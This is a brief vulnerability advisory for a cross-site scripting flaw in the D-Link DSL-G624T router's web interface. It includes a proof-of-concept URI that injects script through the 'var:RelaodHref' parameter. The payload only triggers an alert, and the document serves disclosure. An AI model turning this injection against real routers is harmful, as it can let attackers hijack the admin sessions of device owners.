D-Link DSL-G624T Var:RelaodHref Cross-Site Scripting Vulnerability

D-Link DSL-G624T Var:RelaodHref Cross-Site Scripting Vulnerability

An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.

The following proof-of-concept URI is available.

http://www.example.com/cgi-bin/webcm?getpage=../html/home/home_RelaodHref.htm&var:RelaodHref=a"%20==%20"a"){alert("XSS")}}</script>